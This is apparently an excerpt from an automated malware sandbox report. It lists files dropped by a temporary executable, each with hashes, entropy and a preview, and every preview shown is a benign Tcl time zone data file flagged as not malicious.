                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Ust-Nera) {. {-9223372036854775808 34374 0 LMT}. {-1579426374 28800 0 +08}. {354898800 43200 0 +12}. {370699200 39600 0 +11}. {386427600 43200 1 +12}. {402235200 39600 0 +11}. {417963600 43200 1 +12}. {433771200 39600 0 +11}. {449586000 43200 1 +12}. {465318000 39600 0 +11}. {481042800 43200 1 +12}. {496767600 39600 0 +11}. {512492400 43200 1 +12}. {528217200 39600 0 +11}. {543942000 43200 1 +12}. {559666800 39600 0 +11}. {575391600 43200 1 +12}. {591116400 39600 0 +11}. {606841200 43200 1 +12}. {622566000 39600 0 +11}. {638290800 43200 1 +12}. {654620400 39600 0 +11}. {670345200 36000 0 +11}. {670348800 39600 1 +11}. {686073600 36000 0 +10}. {695750400 39600 0 +12}. {701794800 43200 1 +12}. {717519600 39600 0 +11}. {733244400 43200 1 +12}. {748969200 39600 0 +11}. {764694000 43200 1 +12}. {780418800 39600 0 +11}. {796143600 43
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):174
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.808435832735883
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyq8VLYO5YFwVAIgN8ELYOAvN2WFKgTjEHp4WFKELYOun:SlSWB9IZaM3y1LewVAIgKELUvN2wKgsI
                                                                                                                                                                                                                                                                                                                                MD5:6372DA942647071A0514AEBF0AFEB7C7
                                                                                                                                                                                                                                                                                                                                SHA1:C9FB6B05DA246224D5EB016035AB905657B9D3FA
                                                                                                                                                                                                                                                                                                                                SHA-256:7B1A3F36E9A12B850DC06595AAE6294FAEAC98AD933B3327B866E83C0E9A1999
                                                                                                                                                                                                                                                                                                                                SHA-512:DC7D8753AD0D6908CA8765623EC1C4E4717833D183435957BB43E7ADB8A0D078F87319408F4C1D284CFB24BE010141B3254A36EF50C5DDCC59D7DEE5B3E33B7F
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Bangkok)]} {. LoadTimeZoneFile Asia/Bangkok.}.set TZData(:Asia/Vientiane) $TZData(:Asia/Bangkok).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1991
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.617868789838068
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:cQ6EeBGZKFyW3bEH6i4bfwRpiTQNuTHDMOFOnJfioEkfhbZUAPQ:56aZWf3bw6HfavuLoOUDEChbmAPQ
                                                                                                                                                                                                                                                                                                                                MD5:589D58D0819C274BD76648B290E3B6A7
                                                                                                                                                                                                                                                                                                                                SHA1:8EF67425A86E1663263C380B81C878EFEE107261
                                                                                                                                                                                                                                                                                                                                SHA-256:F7CA7543A15D0EA7380552E9CA4506E1527D5A0C9081B21A6A6CAEAD51085293
                                                                                                                                                                                                                                                                                                                                SHA-512:38A4264039866E82CC2CCAF52FF1AB3384A72AD9F2FF0060FC49B3D2C09CB072700F28F2CA3A0850B3E5BAB62F6AA6031ECAB2EAB09EB08833D8CD778B338BDD
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Vladivostok) {. {-9223372036854775808 31651 0 LMT}. {-1487321251 32400 0 +09}. {-1247562000 36000 0 +11}. {354895200 39600 1 +11}. {370702800 36000 0 +10}. {386431200 39600 1 +11}. {402238800 36000 0 +10}. {417967200 39600 1 +11}. {433774800 36000 0 +10}. {449589600 39600 1 +11}. {465321600 36000 0 +10}. {481046400 39600 1 +11}. {496771200 36000 0 +10}. {512496000 39600 1 +11}. {528220800 36000 0 +10}. {543945600 39600 1 +11}. {559670400 36000 0 +10}. {575395200 39600 1 +11}. {591120000 36000 0 +10}. {606844800 39600 1 +11}. {622569600 36000 0 +10}. {638294400 39600 1 +11}. {654624000 36000 0 +10}. {670348800 32400 0 +10}. {670352400 36000 1 +10}. {686077200 32400 0 +09}. {695754000 36000 0 +11}. {701798400 39600 1 +11}. {717523200 36000 0 +10}. {733248000 39600 1 +11}. {748972800 36000 0 +10}. {764697600 39600 1 +11}. {7804224
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1987
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.6163895181017764
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:cQVe7Ox4ER6oziDpiKXtyiyzilUBinUijiRziiiaSiYzYWk2HgQiMhNIziPiRikL:5Q+9InX4n7m84nPIzOtfjQhGT+
                                                                                                                                                                                                                                                                                                                                MD5:29C007E4E3E0015DBF39D78DF39CB790
                                                                                                                                                                                                                                                                                                                                SHA1:C3311ED4D7774A7DC14E0436D0B90C88ADD9BDA5
                                                                                                                                                                                                                                                                                                                                SHA-256:C2DD93EEAFC3E2FD6CCE0EED0633C40D8BF34331760D23A75ADCEA1719A11AE6
                                                                                                                                                                                                                                                                                                                                SHA-512:24609B8C01F3420CC19CA8F5AC78867DCAD1DD1A09A4B1C5356F90F0041BBCA322BC0C64D5DE4F565331674CFE15B7BF66AF6B69ACE9D18765A91B044962F781
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Yakutsk) {. {-9223372036854775808 31138 0 LMT}. {-1579423138 28800 0 +08}. {-1247558400 32400 0 +10}. {354898800 36000 1 +10}. {370706400 32400 0 +09}. {386434800 36000 1 +10}. {402242400 32400 0 +09}. {417970800 36000 1 +10}. {433778400 32400 0 +09}. {449593200 36000 1 +10}. {465325200 32400 0 +09}. {481050000 36000 1 +10}. {496774800 32400 0 +09}. {512499600 36000 1 +10}. {528224400 32400 0 +09}. {543949200 36000 1 +10}. {559674000 32400 0 +09}. {575398800 36000 1 +10}. {591123600 32400 0 +09}. {606848400 36000 1 +10}. {622573200 32400 0 +09}. {638298000 36000 1 +10}. {654627600 32400 0 +09}. {670352400 28800 0 +09}. {670356000 32400 1 +09}. {686080800 28800 0 +08}. {695757600 32400 0 +10}. {701802000 36000 1 +10}. {717526800 32400 0 +09}. {733251600 36000 1 +10}. {748976400 32400 0 +09}. {764701200 36000 1 +10}. {780426000 3
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):235
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.635396864572362
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSWB9X52wKsCm2OHGVQPZN6FCm+UlDVkvScChY/s5Uq:MBp52zmdHGuPZNAkHCpr
                                                                                                                                                                                                                                                                                                                                MD5:12B1D08ED6DFAB647D8F1D1371D771F6
                                                                                                                                                                                                                                                                                                                                SHA1:2AC1CE6E85533D6B99A8E9725F43A867833B956E
                                                                                                                                                                                                                                                                                                                                SHA-256:DCC9323EF236D2E3B6DAA296EB14B9208754FCD449D2351067201BCEC15381A2
                                                                                                                                                                                                                                                                                                                                SHA-512:C563B6A3F1B21B5FFD0F092CAF6344D5A6D74F5AC03DA44DCA6FB1B4BC0D321C6E0E8F315248D41C0D1D0FFD35F8DE31D96FBD4AE1CFE15DA52E40EE3FF7F8E3
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Yangon) {. {-9223372036854775808 23087 0 LMT}. {-2840163887 23087 0 RMT}. {-1577946287 23400 0 +0630}. {-873268200 32400 0 +09}. {-778410000 23400 0 +0630}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2023
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.6129679767742124
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:5iKkhr7YqXZIoLybDNUoXKXmpsuNjcgy8TmQ28N7Wdw+5vDT7L:w2xd8kCdf
                                                                                                                                                                                                                                                                                                                                MD5:9C578B55160C4CDE22E0CD3AE449AA89
                                                                                                                                                                                                                                                                                                                                SHA1:DAEB24B867A835AA97E7E6A67C1AD4278015D6BB
                                                                                                                                                                                                                                                                                                                                SHA-256:924E60D3C57F296CDEA175D4E970FF3C68A92ADBBBA23EF37B76D7AD5D41DCE9
                                                                                                                                                                                                                                                                                                                                SHA-512:E3F2798038F897DF5D1D112F294BFD4E3FDBFCF4D568C4038C85289F84E0844010A6C88659C4B9D94720DBB680F2628CECEB17E6C6D0DFC231E6DCBA75068458
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Yekaterinburg) {. {-9223372036854775808 14553 0 LMT}. {-1688270553 13505 0 PMT}. {-1592610305 14400 0 +04}. {-1247544000 18000 0 +06}. {354913200 21600 1 +06}. {370720800 18000 0 +05}. {386449200 21600 1 +06}. {402256800 18000 0 +05}. {417985200 21600 1 +06}. {433792800 18000 0 +05}. {449607600 21600 1 +06}. {465339600 18000 0 +05}. {481064400 21600 1 +06}. {496789200 18000 0 +05}. {512514000 21600 1 +06}. {528238800 18000 0 +05}. {543963600 21600 1 +06}. {559688400 18000 0 +05}. {575413200 21600 1 +06}. {591138000 18000 0 +05}. {606862800 21600 1 +06}. {622587600 18000 0 +05}. {638312400 21600 1 +06}. {654642000 18000 0 +05}. {670366800 14400 0 +05}. {670370400 18000 1 +05}. {686095200 14400 0 +04}. {695772000 18000 0 +06}. {701816400 21600 1 +06}. {717541200 18000 0 +05}. {733266000 21600 1 +06}. {748990800 18000 0 +05}. {764
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1959
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.554930605948629
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:cQO4LeuVrqpkb/cXXn8UDu5u8WmFeb/RLc9qENkw/ybt8i9E60339UyuUgUU2heQ:5x79TVOZmF7N76eHvdSB4tJFFWmvN
                                                                                                                                                                                                                                                                                                                                MD5:013DD03BE28257101FC72E3294709AC6
                                                                                                                                                                                                                                                                                                                                SHA1:2EBBB3DA858B1BBC0C3CDFCBED3A4BAA0D6CE1B2
                                                                                                                                                                                                                                                                                                                                SHA-256:15CBC98425C074D9D5D1B107483BF68C75C318C240C7CDBDA390F8D102D76D53
                                                                                                                                                                                                                                                                                                                                SHA-512:10A651C82E6D5386FDC1FC95EF15F1CB0A4D8850A2324E7D62F63E1D3FBA87812045FFCF1DF013D7A3E90BBF514A4C5B2B23C547905737193B369644986D6A42
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Yerevan) {. {-9223372036854775808 10680 0 LMT}. {-1441162680 10800 0 +03}. {-405140400 14400 0 +04}. {354916800 18000 1 +04}. {370724400 14400 0 +04}. {386452800 18000 1 +04}. {402260400 14400 0 +04}. {417988800 18000 1 +04}. {433796400 14400 0 +04}. {449611200 18000 1 +04}. {465343200 14400 0 +04}. {481068000 18000 1 +04}. {496792800 14400 0 +04}. {512517600 18000 1 +04}. {528242400 14400 0 +04}. {543967200 18000 1 +04}. {559692000 14400 0 +04}. {575416800 18000 1 +04}. {591141600 14400 0 +04}. {606866400 18000 1 +04}. {622591200 14400 0 +04}. {638316000 18000 1 +04}. {654645600 14400 0 +04}. {670370400 10800 0 +03}. {670374000 14400 1 +03}. {686098800 10800 0 +03}. {701823600 14400 1 +03}. {717548400 10800 0 +03}. {733273200 14400 1 +03}. {748998000 10800 0 +03}. {764722800 14400 1 +03}. {780447600 10800 0 +03}. {796172400 14
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):9474
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.4598088631836625
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:Mw7Jfsud5vCGy0luUDHaXZgsN/FWVFjHv0:Mwdf/d5vCGy0luZN9WVFjHv0
                                                                                                                                                                                                                                                                                                                                MD5:E9C33EAACFD20C021CE94292068CC1D8
                                                                                                                                                                                                                                                                                                                                SHA1:9F8C0A4E07C33349C6ACDB0564771AEB11098B9D
                                                                                                                                                                                                                                                                                                                                SHA-256:8E2B427733BF8DBCE5171DC57F0892F0987CF1BD7941DA40048CB53B86B23E0D
                                                                                                                                                                                                                                                                                                                                SHA-512:8C77CF236855C51E03911A8203A2E81FC728C21A904B4962EA18F5FD39B00174D8A365FC0CA42E4EDE12DA84DD6445CFBB1B3E922189EB6B13AF6BC802E2B405
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Atlantic/Azores) {. {-9223372036854775808 -6160 0 LMT}. {-2713904240 -6872 0 HMT}. {-1830376800 -7200 0 -02}. {-1689548400 -3600 1 -01}. {-1677794400 -7200 0 -02}. {-1667430000 -3600 1 -01}. {-1647730800 -7200 0 -02}. {-1635807600 -3600 1 -01}. {-1616194800 -7200 0 -02}. {-1604358000 -3600 1 -01}. {-1584658800 -7200 0 -02}. {-1572735600 -3600 1 -01}. {-1553036400 -7200 0 -02}. {-1541199600 -3600 1 -01}. {-1521500400 -7200 0 -02}. {-1442444400 -3600 1 -01}. {-1426806000 -7200 0 -02}. {-1379286000 -3600 1 -01}. {-1364770800 -7200 0 -02}. {-1348441200 -3600 1 -01}. {-1333321200 -7200 0 -02}. {-1316386800 -3600 1 -01}. {-1301266800 -7200 0 -02}. {-1284332400 -3600 1 -01}. {-1269817200 -7200 0 -02}. {-1221433200 -3600 1 -01}. {-1206918000 -7200 0 -02}. {-1191193200 -3600 1 -01}. {-1175468400 -7200 0 -02}. {-1127689200 -3600 1 -01}. {-111196440
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):7684
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.7376923223964162
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:UdPvxrPGgFEUlpde9pXbO53oVmM7IEc2fVGYu2yeB/T/eleWmBk81kS/kV6kef4E:lJv
                                                                                                                                                                                                                                                                                                                                MD5:E55A91A96E1DC267AAEFAF27866F0A90
                                                                                                                                                                                                                                                                                                                                SHA1:A3E8DB332114397F4F487256E9168E73784D3637
                                                                                                                                                                                                                                                                                                                                SHA-256:A2EB47B25B3A389907DD242C86288073B0694B030B244CCF90421C0B510267BD
                                                                                                                                                                                                                                                                                                                                SHA-512:9A8140365D76F1A83A98A35593638F2C047B3D2B1E9D0F6ACB2B321EBDB9CC5B6C8CCD3C110B127A12DCDB7D9ED16A8F7DB7DA7A8B4587486D060FACCA23F993
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Atlantic/Bermuda) {. {-9223372036854775808 -15558 0 LMT}. {-1262281242 -14400 0 AST}. {136360800 -10800 0 ADT}. {152082000 -14400 0 AST}. {167810400 -10800 1 ADT}. {183531600 -14400 0 AST}. {189316800 -14400 0 AST}. {199260000 -10800 1 ADT}. {215586000 -14400 0 AST}. {230709600 -10800 1 ADT}. {247035600 -14400 0 AST}. {262764000 -10800 1 ADT}. {278485200 -14400 0 AST}. {294213600 -10800 1 ADT}. {309934800 -14400 0 AST}. {325663200 -10800 1 ADT}. {341384400 -14400 0 AST}. {357112800 -10800 1 ADT}. {372834000 -14400 0 AST}. {388562400 -10800 1 ADT}. {404888400 -14400 0 AST}. {420012000 -10800 1 ADT}. {436338000 -14400 0 AST}. {452066400 -10800 1 ADT}. {467787600 -14400 0 AST}. {483516000 -10800 1 ADT}. {499237200 -14400 0 AST}. {514965600 -10800 1 ADT}. {530686800 -14400 0 AST}. {544600800 -10800 1 ADT}. {562136400 -14400 0 AST}. {576050
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):6609
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.7165368441152715
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:KXu/30NSfAewvtj544IrvfMS4pBs6nLUxZlJFXmA3SG7iL8malvkUEYo4Q:KX5IMj544IrvfMsbxZTH7qwQ
                                                                                                                                                                                                                                                                                                                                MD5:230C7B4BB6D64818889E573ADBE97E35
                                                                                                                                                                                                                                                                                                                                SHA1:97E6D43C3F9446C9A224DAF69F31CA55721BFC59
                                                                                                                                                                                                                                                                                                                                SHA-256:6CDA69514774093B7219BB079077322F5C783DBAD137F89181E8434D8BD2A6CF
                                                                                                                                                                                                                                                                                                                                SHA-512:A17246BC44C1FDC971304E0D2E8F721E254880FB725F1AACCA05645FFE82F2AF3791234F02824E357CBDD51D529C882E21B8712735C32420074F3B75813DE27C
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Atlantic/Canary) {. {-9223372036854775808 -3696 0 LMT}. {-1509663504 -3600 0 -01}. {-733874400 0 0 WET}. {323827200 3600 1 WEST}. {338950800 0 0 WET}. {354675600 3600 1 WEST}. {370400400 0 0 WET}. {386125200 3600 1 WEST}. {401850000 0 0 WET}. {417574800 3600 1 WEST}. {433299600 0 0 WET}. {449024400 3600 1 WEST}. {465354000 0 0 WET}. {481078800 3600 1 WEST}. {496803600 0 0 WET}. {512528400 3600 1 WEST}. {528253200 0 0 WET}. {543978000 3600 1 WEST}. {559702800 0 0 WET}. {575427600 3600 1 WEST}. {591152400 0 0 WET}. {606877200 3600 1 WEST}. {622602000 0 0 WET}. {638326800 3600 1 WEST}. {654656400 0 0 WET}. {670381200 3600 1 WEST}. {686106000 0 0 WET}. {701830800 3600 1 WEST}. {717555600 0 0 WET}. {733280400 3600 1 WEST}. {749005200 0 0 WET}. {764730000 3600 1 WEST}. {780454800 0 0 WET}. {796179600 3600 1 WEST}. {811904400 0 0 WET
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):237
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.579111187402317
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSWB9X52RQ7Sm2OHDVJlvQV2FlRo/FFuykVvQV2FR+nmY:MBp5267SmdHDVwiHoGyLiomY
                                                                                                                                                                                                                                                                                                                                MD5:51BE50511F1FA17A6AF9D4AE892FAFDA
                                                                                                                                                                                                                                                                                                                                SHA1:2491743E429AAE5DF70CC3E791DC9875E30F152D
                                                                                                                                                                                                                                                                                                                                SHA-256:E444B51A4511F83D616E816B770A60088EA94B9286112F47331122F44119541D
                                                                                                                                                                                                                                                                                                                                SHA-512:A509146E25174D9938AF13B78CF052E45F50A61B834C276607B281EF7B81C6696A793A3769B355C8C804A74F37ADDEBBCDC2A69E3B938EB5A2A9742BE135A4A7
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Atlantic/Cape_Verde) {. {-9223372036854775808 -5644 0 LMT}. {-1830376800 -7200 0 -02}. {-862610400 -3600 1 -01}. {-764118000 -7200 0 -02}. {186120000 -3600 0 -01}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):181
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.655846706649014
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqLG4E2wFVAIgvMG4EeL2RQqG4EZrB/4RQqG4Ei:SlSWB9IZaM3yCwFVAIgvgL2RQ1rB/4R/
                                                                                                                                                                                                                                                                                                                                MD5:08C5EE09B8BE16C5E974BA8070D448EA
                                                                                                                                                                                                                                                                                                                                SHA1:D171C194F6D61A891D3390FF6492AEFB0F67646A
                                                                                                                                                                                                                                                                                                                                SHA-256:7C6A6BCF5AAEAB1BB57482DF1BBC934D367390782F6D8C5783DBBBE663169A9B
                                                                                                                                                                                                                                                                                                                                SHA-512:E885F3C30DBE178F88464ED505BA1B838848E6BB15C0D27733932CD0634174D9645C5098686E183CC93CB46DE7EB0DBF2EB64CB77A50FC337E2581E25107C9A6
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Atlantic/Faroe)]} {. LoadTimeZoneFile Atlantic/Faroe.}.set TZData(:Atlantic/Faeroe) $TZData(:Atlantic/Faroe).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):6551
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.7148806034051316
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:9bd30NSfAewvtj544IrvfMS4pBs6nLUxZlJFXmA3SG7iL8malvkUEYo4Q:8IMj544IrvfMsbxZTH7qwQ
                                                                                                                                                                                                                                                                                                                                MD5:918E1825106C5C73B203B718918311DC
                                                                                                                                                                                                                                                                                                                                SHA1:7C31B3521B396FE6BE7162BAECC4CFB4740F622B
                                                                                                                                                                                                                                                                                                                                SHA-256:B648E691D8F3417B77EFB6D6C2F5052B3C4EAF8B5354E018EE2E9BD26F867B71
                                                                                                                                                                                                                                                                                                                                SHA-512:5B1B5FE82A13127E3C63C8FB0A8CBD45A7277EF29720B937BB3174E8301830018755416D604F3551622E2E4D365D35E4EE1DF39B587A73E43AE0C68D1996B771
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Atlantic/Faroe) {. {-9223372036854775808 -1624 0 LMT}. {-1955748776 0 0 WET}. {347155200 0 0 WET}. {354675600 3600 1 WEST}. {370400400 0 0 WET}. {386125200 3600 1 WEST}. {401850000 0 0 WET}. {417574800 3600 1 WEST}. {433299600 0 0 WET}. {449024400 3600 1 WEST}. {465354000 0 0 WET}. {481078800 3600 1 WEST}. {496803600 0 0 WET}. {512528400 3600 1 WEST}. {528253200 0 0 WET}. {543978000 3600 1 WEST}. {559702800 0 0 WET}. {575427600 3600 1 WEST}. {591152400 0 0 WET}. {606877200 3600 1 WEST}. {622602000 0 0 WET}. {638326800 3600 1 WEST}. {654656400 0 0 WET}. {670381200 3600 1 WEST}. {686106000 0 0 WET}. {701830800 3600 1 WEST}. {717555600 0 0 WET}. {733280400 3600 1 WEST}. {749005200 0 0 WET}. {764730000 3600 1 WEST}. {780454800 0 0 WET}. {796179600 3600 1 WEST}. {811904400 0 0 WET}. {828234000 3600 1 WEST}. {846378000 0 0 WET}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):175
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.92967249261586
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqxVyWJooedVAIgoqxWJ0YF2RQqG0EHEcAg/h8QasWJ/n:SlSWB9IZaM3ymSDdVAIgo2Q2RQaK8H
                                                                                                                                                                                                                                                                                                                                MD5:AD9B5217497DBC1CE598573B85F3C056
                                                                                                                                                                                                                                                                                                                                SHA1:60984544F5BBD4A5B2B8F43741D66A573A2CF1DC
                                                                                                                                                                                                                                                                                                                                SHA-256:BE291E952254B6F0C95C2E2497BE12410D7F1E36D0D1035B3A9BC65D0EDCB65F
                                                                                                                                                                                                                                                                                                                                SHA-512:F5D47008495425C386EBAB426195393168E402726405CF23826571E548A3CEFABBA51D87D637C0724FF2CC4F1276D81EACF14D0F9CFC7CBFCC025EEFA0960278
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/Oslo)]} {. LoadTimeZoneFile Europe/Oslo.}.set TZData(:Atlantic/Jan_Mayen) $TZData(:Europe/Oslo).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):9307
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.715509739111961
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:jZqAUb1iF0Rf0IMj544IrvfMsbxZTH7qwQ:jZqAUb1iF0RffMUM8xZTH7qwQ
                                                                                                                                                                                                                                                                                                                                MD5:5D2EAAA0D116DD1C7965FCB229678FB4
                                                                                                                                                                                                                                                                                                                                SHA1:DA59652A8E57DE9FAF02ED6EB9D863CD34642E6C
                                                                                                                                                                                                                                                                                                                                SHA-256:8AAF754C1F9AABEA185808F21B864B02815D24451DB38BE8629DA4C57141E8F5
                                                                                                                                                                                                                                                                                                                                SHA-512:E561B09A53CEC764B0B2B2544E774577553F6DFEFB80AEC04698C2B0FBEBBC7F03E11C31627654346752B4F85BB3EF669397162599F3ED6B8B8D286521447361
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Atlantic/Madeira) {. {-9223372036854775808 -4056 0 LMT}. {-2713906344 -4056 0 FMT}. {-1830380400 -3600 0 -01}. {-1689552000 0 1 +00}. {-1677798000 -3600 0 -01}. {-1667433600 0 1 +00}. {-1647734400 -3600 0 -01}. {-1635811200 0 1 +00}. {-1616198400 -3600 0 -01}. {-1604361600 0 1 +00}. {-1584662400 -3600 0 -01}. {-1572739200 0 1 +00}. {-1553040000 -3600 0 -01}. {-1541203200 0 1 +00}. {-1521504000 -3600 0 -01}. {-1442448000 0 1 +00}. {-1426809600 -3600 0 -01}. {-1379289600 0 1 +00}. {-1364774400 -3600 0 -01}. {-1348444800 0 1 +00}. {-1333324800 -3600 0 -01}. {-1316390400 0 1 +00}. {-1301270400 -3600 0 -01}. {-1284336000 0 1 +00}. {-1269820800 -3600 0 -01}. {-1221436800 0 1 +00}. {-1206921600 -3600 0 -01}. {-1191196800 0 1 +00}. {-1175472000 -3600 0 -01}. {-1127692800 0 1 +00}. {-1111968000 -3600 0 -01}. {-1096848000 0 1 +00}. {-10805184
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1962
